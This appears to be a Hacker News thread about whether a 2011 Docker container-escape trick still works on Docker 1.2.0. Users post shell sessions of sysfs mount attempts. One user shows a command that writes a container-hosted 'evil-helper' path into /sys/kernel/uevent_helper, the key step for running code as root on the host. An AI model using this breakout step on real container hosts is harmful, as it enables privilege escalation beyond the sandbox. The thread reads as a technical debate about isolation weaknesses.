Hacker News new | ask | show | jobs
by stevekemp 4270 days ago
This is the first that comes to mind:

http://blog.bofh.it/debian/id_413
1 comments
kalmi10 4270 days ago
That's an article from 2011. This evasion does not work today.
link
stevekemp 4270 days ago
That example is old, but yes it does work, and will continue to work until docker uses user namespaces.

That said the example is not a good one because of the changes applied these days, e.g. the use of the UID on the host-side.

link
kalmi10 4270 days ago
I actually tried it on Docker 1.2.0 with the ubuntu:14.04 image.

/sys is already mounted and it is read-only, and it cannot be mounted manually:

  root@07ba8c752195:/# mkdir sys2
  root@07ba8c752195:/# mount -t sysfs sysfs /sys2
  mount: block device sysfs is write-protected, mounting read-only
  mount: cannot mount block device sysfs read-only
link
Lai0chee 4270 days ago
BTW: Just one example of a typical Linux namespace vulnerability: http://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-na...
link
stevekemp 4270 days ago
I tested this with the busybox image, and received a warning that /sys was already mounted, but the attack then proceded to work as expected.
link
kalmi10 4270 days ago 

  kalmi@sylph ~> docker run -t -i busybox:latest
  / # mount -t sysfs sysfs /sys
  mount: permission denied (are you root?)
  / # mkdir sys2
  / # mount -t sysfs sysfs /sys2
  mount: mounting sysfs on /sys2 failed: Permission denied

  kalmi@sylph ~> docker --version
  Docker version 1.2.0, build fa7b24f

  kalmi@sylph ~> uname -r
  Linux sylph 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:42 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
link
stevekemp 4269 days ago
We don't need to argue about this, but I see the same permission-denied issue as you, but that doesn't matter.

The /sys is mounted already and reading/writing to it succeeds:

     / # mount -t sysfs sysfs /sys
     mount: permission denied (are you root?)

     / # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper

     / # cat   /sys/kernel/uevent_helper
     /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper
From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..
link